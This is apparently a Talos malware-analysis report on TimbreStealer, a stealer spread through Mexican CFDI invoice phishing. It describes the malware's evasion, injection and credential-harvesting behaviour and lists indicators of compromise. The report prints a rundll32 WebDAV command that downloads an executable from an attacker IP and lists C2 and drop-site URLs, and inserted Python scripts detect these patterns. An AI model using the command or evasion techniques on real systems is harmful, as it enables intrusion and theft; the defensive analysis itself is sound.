- Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.”
- This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
- TimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.
- It contains several embedded modules used for orchestration, decryption and protection of the malware binary.
Talos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023. This campaign uses phishing emails with financial themes, directing users to a compromised website where the payload is hosted and tricking them into executing the malicious application.
Talos has observed new distribution campaigns being conducted by this threat actor since at least September 2023, when they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers before changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we haven’t found any evidence of Mispadu being used anymore.
The phishing campaign uses geofencing techniques to target only users in Mexico; any attempt to contact the payload sites from other locations returns a blank PDF file instead of the malicious file. The current spam run was observed to mainly use Mexico's digital tax receipt standard, CFDI (“Comprobante Fiscal Digital por Internet,” or online digital fiscal invoice in English). Talos has also observed emails with generic invoice themes used for the same campaign.
Although we could not find hard evidence linking the two campaigns, we assess with high confidence they are operated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity distributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more evidence of Mispadu being used.
TimbreStealer, a new obfuscated information stealer
Talos has identified a new family of information stealers while investigating a spam campaign targeting Mexican users starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam campaign which we will analyze later.
TimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution, and ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass conventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit process, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the authors are skilled and have developed these components in-house.
The sample we’re analyzing was found on a victim machine following a visit to a compromised website after the user clicked on a link in a spam email.
Our analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption process involving a main orchestration DLL and a global decryption key which is used throughout the different modules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the initial modules and their relationship.
TimbreStealer’s Decryption Process
This first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first scan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this point will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from 32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued.
Once this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has its MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now launches the DLL passing the Zw* hash table as an argument to its exported function.
Decryption of all submodules makes use of a global decryption key. As the execution of the malware progresses, this key is encrypted over and over again. If execution does not follow every step of the expected path, the decryption key will get out of sync and all subsequent decryptions will fail.
This prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments to access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption rounds on the global key are scattered about in the code and even occur from within the different sub-modules themselves.
All stages of this malware use the same coding style and techniques. We therefore assess with high confidence that all obfuscation layers and final payload were developed by the same authors.
TimbreStealer’s embedded modules
Once the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s being executed in a sandbox environment. It will also extract the many submodules embedded in the payload. Talos identified at least three different layers after the main payload was extracted, with several modules in each layer used for different functions:
The second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest and extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first checks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin American region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to ensure it is not running in a sandbox environment.
At this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of previous infection, and scan the system browsers for signs of natural use. The files and registry keys checked by the malware include the non-exhaustive list below:
- HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
- {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
- {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
- {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
- {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
- {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
- {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
- C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
- Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U
The presence of these keys along with other checks mentioned before will prevent the execution of the remaining stages of the malware.
The orchestrator contains four other encrypted sub-modules within it.
All blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and can optionally decompress the raw data if specified. This overall architecture has been observed in all layers.
Each stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred to this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.
Submodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on the global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer include:
- VMWare hook and port checks.
- Vpcext, IceBP, int 2D instructions to detect debuggers.
- Checking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone, safespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd, google_persistentdisk.
If all of these checks complete as expected, then the final module can be decrypted successfully.
Submodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy document will also be displayed to help defer suspicion.
Execution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses Microsoft’s reg.exe to add a run once registry key, and then trigger rundll32.exe to process this entry through the system iernonce.dll.
Under certain conditions, this layer can also modify Group Policy options to set startup scripts.
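The persistence chain described above (a scheduled task runs reg.exe to write a RunOnce entry, then rundll32.exe processes it through iernonce.dll) can be correlated in process-creation telemetry. This is an added detection sketch, not Talos code: the Sysmon-like event dicts are constructed, the RunOnce value data is a placeholder, and the five-minute correlation window is an assumption.

```python
import re
from datetime import datetime, timedelta

# reg.exe adding a value under any ...\RunOnce (or RunOnceEx) key
REG_RUNONCE = re.compile(r"\breg(?:\.exe)?\s+add\b.*\\RunOnce", re.IGNORECASE)
# rundll32.exe being handed iernonce.dll, the RunOnce processor
RUNDLL_IERNONCE = re.compile(r"\brundll32(?:\.exe)?\b.*\biernonce\.dll\b", re.IGNORECASE)

# Assumption: both steps run from the same scheduled task, so a tight window suffices.
WINDOW = timedelta(minutes=5)


def classify(event):
    """Tag one process-creation event, or return None when it is not of interest."""
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "")
    if image.endswith("reg.exe") and REG_RUNONCE.search(cmd):
        return "reg_runonce_add"
    if image.endswith("rundll32.exe") and RUNDLL_IERNONCE.search(cmd):
        return "rundll32_iernonce"
    return None


def find_chains(events):
    """Correlate a reg.exe RunOnce write with a later rundll32/iernonce launch on
    the same host inside WINDOW. Returns one alert per matched pair."""
    alerts = []
    pending = {}  # host -> reg_runonce_add events seen so far
    for ev in sorted(events, key=lambda e: e["time"]):
        tag = classify(ev)
        if tag == "reg_runonce_add":
            pending.setdefault(ev["host"], []).append(ev)
        elif tag == "rundll32_iernonce":
            recent = [p for p in pending.get(ev["host"], [])
                      if ev["time"] - p["time"] <= WINDOW]
            if recent:
                alerts.append({"host": ev["host"], "reg_event": recent[-1],
                               "rundll32_event": ev})
    return alerts


def _ev(host, when, image, command_line):
    return {"host": host, "time": datetime.fromisoformat(when),
            "image": image, "command_line": command_line}


# Constructed sample telemetry (not real events). The RunOnce value data is a
# placeholder; the page does not state what the real entry points to.
SAMPLE_EVENTS = [
    _ev("WS01", "2024-01-10T09:00:00", r"C:\Windows\System32\reg.exe",
        r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" '
        r'/v Update /t REG_SZ /d "<placeholder payload command>" /f'),
    _ev("WS01", "2024-01-10T09:00:03", r"C:\Windows\System32\rundll32.exe",
        r"rundll32.exe iernonce.dll,RunOnceExProcess"),
    # Benign: reading a Run key is not a write.
    _ev("WS02", "2024-01-10T09:01:00", r"C:\Windows\System32\reg.exe",
        r'reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"'),
    # Benign: rundll32 with an unrelated DLL.
    _ev("WS01", "2024-01-10T09:02:00", r"C:\Windows\System32\rundll32.exe",
        r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    # iernonce alone, with no preceding RunOnce write on that host: not correlated.
    _ev("WS03", "2024-01-10T09:03:00", r"C:\Windows\System32\rundll32.exe",
        r"rundll32.exe iernonce.dll,RunOnceExProcess"),
]

if __name__ == "__main__":
    for a in find_chains(SAMPLE_EVENTS):
        print(a["host"], a["reg_event"]["time"], "->", a["rundll32_event"]["command_line"])
```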
TimbreStealer’s Installed DLL modules
The installed DLL named Cecujujajofubo475.dll uses the same overall architecture as the first DLL detailed above, with all of its internal strings encrypted, uses a global decrypt buffer, and uses a different Zw* API hash table to perform direct syscalls avoiding user API.
In this layer there are also TLS callbacks to add complexity to the global decrypt buffer encryption. An extra round of encryption has also been added that depends on the parent process name and on a value within the registry key given above, to prevent analysis on third-party machines.
This DLL contains eight encrypted sub-modules within it:
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
While this DLL contains many of the same protections found in the installation phase, several more have been identified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for Windows data collection.
Another interesting protection overwrites all of the DLLs loaded in the process with clean copies from disk. This wipes all antivirus vendor user-mode hooks, software breakpoints and user patches during execution.
This DLL serves as a loader for the final payload which is housed within the ApplicationIcon.ico file shown in the previous relationship diagram. Submodule No. 7 will be the default loader that Submodule attempts to launch. They attempt to inject this 64-bit DLL into a preferred list of svchost.exe processes.
The order of preference is based on svchost.exe process command line, looking for the following strings:
- DcomLaunch
- Power
- BrokerInfrastructure
- LSM
- Schedule
If the injections into svchost.exe fail, a 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using syscalls with a modified context, and ResumeThread then triggers its execution. All memory allocations for the shellcode are also performed through the syscall mechanism set up earlier.
The first stage of the shellcode decrypts its second stage, then extracts and decrypts the final payload DLL from the ApplicationIcon.ico file. The 32-bit version again uses a custom PE loader to directly load and run the final payload DLL within its own process after extraction.
TimbreStealer’s Final Payload Module
The architecture of this layer is the same as all of the previous and contains an additional nine sub-modules. Analysis of this final payload module and submodules is still ongoing at the time of writing:
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
The following is a preliminary analysis of the malware features based on the strings we were able to decrypt from this module. They indicate the malware can collect a variety of information from the machine and post data to an external website, which is typical behavior of an information stealer.
Collect credential information from the victim’s machine
The following strings were found in functions scanning files and directories. This module also embeds the SQLite library to handle different browsers' credential storage files.
- CloudManagementEnrollmentToken
- Google\\Chrome Beta\\User Data
- Google\\Chrome Dev\\User Data
- Google\\Chrome SxS\\User Data
- Google\\Chrome\\User Data
- Google\\Policies
- Microsoft\\Edge Beta\\User Data
- Microsoft\\Edge Dev\\User Data
- Microsoft\\Edge\\User Data
- Software\\Google\\Chrome
- Software\\Google\\Chrome\\Enrollment
- Software\\Google\\Enrollment
- Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
- SOFTWARE\\Microsoft\\Cryptography
- Software\\Policies\\Google\\Chrome
- Software\\Policies\\Google\\Update
- history
- feeds
- feeds cache
- internet explorer
- media player
- office
- OneDrive
- packages
- Skydrive
- Formhistory.sqlite
- SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
- SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
- Mozilla\\Firefox\\Profiles\\
- Thunderbird\\Profiles\\
- Postbox\\Profiles\\
- PostboxApp\\Profiles\\
- SOFTWARE\\Mozilla\\Mozilla Firefox
- SOFTWARE\\Mozilla\\Mozilla Thunderbird
- SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList
Search for Files
The malware also scans several directories looking for files although it’s not clear yet for what purpose. We can see in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders.
Another set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd”, which are related to macOS.
- $360Section
- $AV_ASW
- $GetCurrent
- $Recycle.Bin
- $SysReset
- $WinREAgent
- .fseventsd
- .Spotlight-V100
- AdwCleaner
- AMD
- Autodesk
- boot
- Brother
- Config.Msi
- Documents and Settings
- EFI
- Hewlett-Packard
- inetpub
- Intel
- MSOCache
- PerfLogs
- Program Files
- Program Files (x86)
- ProgramData
- Recovery
- RecoveryImage
- Resources
- SWSetup
- System Volume Information
- SYSTEM.SAV
- ~MSSETUP.T
- $WINDOWS.
- AutoKMS
- KMSAuto
- Users
- AppData\\Local
- AppData\\Roaming
- Desktop
- Documents
- Downloads
- OneDrive
- Dropbox
Collect OS information
TimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a wealth of information about the machine where it’s running.
- OS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate, InstallTime
- SMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion, SerialNumber, Vendor, Version
- Hardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios, Win32_PhysicalMemory
- Network Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer, MemberServer, BackupDomainController, PrimaryDomainController
- Application information: DisplayName, Publisher, DisplayVersion, OSArchitecture
Search for file extensions
The code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not associated with any known file type. This may be indicative of a file that is created by the malware itself.
- .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf
Look for URLs Accessed
The strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to capture network packets, which may be indicative that the malware can do network sniffing.
- npf
- npcap
- npcap_wifi
- www.google.com
- amazon.com
- dropbox.com
- linkedin.com
- twitter.com
- wikipedia.org
- facebook.com
- login.live.com
- apple.com
- www.paypal.com
Disable System Protections
The malware calls a function used to remove System Restore points on the machine. This is typical ransomware behavior, although Talos has not observed any ransomware activity on infected victims. Additional analysis is still needed to confirm or discard this hypothesis.
- SELECT * FROM SystemRestore
- SequenceNumber
- SrClient.dll
- SRRemoveRestorePoint
- SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
- HiberbootEnabled
Look for Remote Desktop Software
The malware attempts to access services and mutexes used by Remote Desktop servers. It’s not clear yet how this is used in the payload code.
- console
- TermService
- Global\\TermSrvReadyEvent
- winlogon.exe
- console
POST data to remote site
A list of URLs along with strings used in HTTP communication was found in functions accessing the network. These URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe these to be the command and control servers used by the malware, but so far, the samples we analyzed have not communicated back to any of them.
- POST
- PUT
- Content-Disposition: form-data; name="
- "; filename="
- "\\r\\nContent-Type: application/octet-stream\\r\\n
- Content-Type: multipart/form-data; boundary=
- Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
- HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
- https://hamster69[.]senac2021[.]org/~armadillo492370/
- https://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
- https://69[.]64[.]35[.]1/~route649289/
These strings are just a small piece of this puzzle, and more analysis is required on the final payload and its embedded modules to understand their exact purpose.
Previous Mispadu spam campaign
Activity associated with these current distribution campaigns was first observed in September 2023 when the threat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised websites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an externally hosted file upon the victim double clicking on it.
Both URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via WebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:
- rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe
During the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in Mexico.
The .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro Federal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file names also typically contained 6 random digits.
The Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have seen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two parameters “f” and “w”:
- hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
- hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
- hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
- hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
- hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
We observed this campaign to be active until the middle of November, at which time a new payload with TimbreStealer was dropped on the victim's computers from the compromised website.
The target industries of this campaign are spread across different verticals, with a slight focus on manufacturing and transportation, as we can see below:
Spam campaign using CFDI as lure
Talos detected a low-volume campaign using CFDI to lure users into downloading and executing a malicious file disguised as a PDF document, starting around the middle of November and still ongoing as of February 2024. CFDI is a mandatory electronic invoice standard used in Mexico for tax reporting purposes. In this campaign, a spam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.
The subjects we observed in this campaign follow the same theme:
- Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
- Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288
The website uses JavaScript to detect characteristics of the user such as geolocation and browser type and then initiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer dropper using WebDAV. The Zip file is usually named following the same theme:
- CFDI_930209.zip
- FACTURA_560208.zip
In case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.
All the URLs for this current campaign follow a similar format:
- hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>
Where <token> above is one of the following strings: “cfdi”, “factura”, “timbreDigital”, “facdigital” or “seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by two numbers.
- hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
- hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
- hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
- hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9
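The drop-site URL format just described (word-plus-digits subdomain, one of the five tokens, a 14-character hex id) and the potential C2 URL shape listed earlier (`https://<host>/~<word><digits>/`) can both be expressed as proxy-log matchers. This is an added example, not Talos code: the log lines are constructed, the indicator values in them are the page's own, and the `/~` rule is deliberately flagged as weak because ordinary user home directories can look similar.

```python
import re

DROP_TOKENS = ("cfdi", "factura", "timbreDigital", "facdigital", "seg_factura")
TOKEN_ALT = "|".join(re.escape(t) for t in DROP_TOKENS)

# Drop site: https://<word><digits>.<compromised domain>/<token>/<14 hex chars>
# Assumption: hostnames in the log are already lowercased (DNS is case-insensitive).
DROP_SITE = re.compile(
    r"^https?://(?P<sub>[a-z]*\d{1,2})\."
    r"(?P<domain>[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})"
    r"/(?P<token>" + TOKEN_ALT + r")"
    r"/(?P<id>[0-9a-f]{14})/?$"
)
# Potential C2: https://<host>/~<word><digits>/  (weak on its own: pair with host reputation)
C2_SITE = re.compile(r"^https?://(?P<host>[^/\s]+)/~(?P<dir>[a-z]+\d+)/?$")


def classify_url(url):
    """Return (rule_name, captured fields) when `url` matches one of the shapes, else None."""
    m = DROP_SITE.match(url)
    if m:
        return "timbrestealer-drop-site", m.groupdict()
    m = C2_SITE.match(url)
    if m:
        return "timbrestealer-possible-c2", m.groupdict()
    return None


def scan_proxy_log(lines):
    """Scan '<timestamp> <client> <method> <url> <status>' records; return the hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        when, client, method, url, status = parts[:5]
        result = classify_url(url)
        if result:
            rule, fields = result
            hits.append({"time": when, "client": client, "method": method,
                         "url": url, "status": status, "rule": rule, **fields})
    return hits


def domains_to_block(hits):
    """Distinct hostnames from the hits, for a block list or DNS sinkhole."""
    return sorted({re.match(r"^https?://([^/]+)", h["url"]).group(1) for h in hits})


# Constructed proxy log lines; the indicator values in them are the page's own.
SAMPLE_LOG = [
    "2024-01-15T10:02:11 10.0.0.25 GET https://pdf85.miramantolama.com/factura/74f871b7ca1977 200",
    "2024-01-15T10:02:12 10.0.0.25 GET https://www.google.com/ 200",
    "2024-01-15T10:05:40 10.0.0.31 GET https://0.solucionegos.top/timbreDigital/e99522f778ea6a 200",
    "2024-01-15T10:06:01 10.0.0.25 POST https://hamster69.senac2021.org/~armadillo492370/ 200",
    "2024-01-15T10:07:15 10.0.0.40 GET https://example.com/~alice/ 404",
    "2024-01-15T10:08:30 10.0.0.25 GET https://pdf85.miramantolama.com/factura/ 404",
]

if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["rule"], h["url"])
    print("block:", domains_to_block(hits))
```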
The .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult, yet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:
User interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to execute, at which point the TimbreStealer main infection will start.
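Both the Mispadu and the TimbreStealer lures rely on a .url file whose target is a WebDAV path with an "@80" port suffix, pointing at an executable while showing a PDF icon. The following added example (not Talos code) parses an Internet Shortcut file and flags exactly that combination; the shortcut content is constructed, the host and path are the ones quoted in the page's rundll32/DavSetCookie example, and the icon path and executable-extension list are assumptions.

```python
import configparser
import re
from urllib.parse import urlsplit

# WebDAV port syntax in a UNC/file host: host@80, host@8080, host@SSL.
WEBDAV_HOST = re.compile(r"^(?P<host>[^@\\/]+)@(?P<port>\d+|SSL)$", re.IGNORECASE)
# Assumption: extensions an invoice lure should never resolve to.
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd", ".msi")


def parse_url_file(text):
    """Return the [InternetShortcut] section of a .url file as a dict (keys keep their case)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    if "InternetShortcut" not in cp:
        raise ValueError("not an InternetShortcut (.url) file")
    return dict(cp["InternetShortcut"])


def webdav_target(url):
    """Split a UNC (\\host@80\share\file) or file://host@80/share/file target into
    (host, port, path); return None for ordinary http(s) links."""
    if url.startswith("\\\\"):
        netloc, _, rest = url[2:].partition("\\")
        path = "\\" + rest
    elif url.lower().startswith("file://"):
        parts = urlsplit(url)
        netloc, path = parts.netloc, parts.path
    else:
        return None
    m = WEBDAV_HOST.match(netloc)
    if not m:
        return None
    return m.group("host"), m.group("port"), path


def assess_url_file(text):
    """Apply the checks and return a verdict plus the reasons behind it."""
    fields = parse_url_file(text)
    url = fields.get("URL", "")
    findings = []
    target = webdav_target(url)
    if target:
        host, port, path = target
        findings.append(f"webdav-delivery host={host} port={port}")
        filename = re.split(r"[\\/]", path)[-1]
        if filename.lower().endswith(EXECUTABLE_EXT):
            findings.append(f"executable-target {filename}")
        # The lure shows a PDF icon while pointing at a program.
        if "pdf" in fields.get("IconFile", "").lower():
            findings.append("pdf-lookalike-icon")
    verdict = "suspicious" if findings else "clean"
    return {"verdict": verdict, "url": url, "findings": findings}


# Constructed sample content. The host and path are the ones quoted in the page's
# rundll32/DavSetCookie example; the icon path is a placeholder.
LURE_URL_FILE = """[InternetShortcut]
URL=\\\\159.89.50.225@80\\formato23\\9577710738\\1242144429.exe
IconFile=C:\\placeholder\\pdf_icon.ico
IconIndex=0
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, content in (("RFC_123456.url", LURE_URL_FILE), ("bookmark.url", BENIGN_URL_FILE)):
        print(name, assess_url_file(content))
```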
ATT&CK TTPs Used in TimbreStealer Campaign
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 63057 - 63072 and 300840 - 300844.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
- Win.Infostealer.TimbreStealer-10021027-0
- Win.Infostealer.TimbreStealer-10021026-0
- Win.Infostealer.Generic-10017202-0
- Win.Packed.Generic-10019162-0
- Win.Dropper.Generic-10017203-0
Indicators of Compromise
IOCs for this research can be found in our GitHub repository here.
Potential C2 URLs
hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
hxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
hxxps://69[.]64[.]35[.]1/~route649289/
IPs
Drop Site URLs
Domains
JavaScript Files
600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f (Downloader)
883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215 (Region check and redirect)
.URL Files
b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7 CFDI_930209.zip
e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f FACTURA_560208.zip
aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af FAC_560208_ATR890126GK2.url_
66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791 FAC_930209_FME140910KI4.url_
Embedded Binaries
Dropper Binaries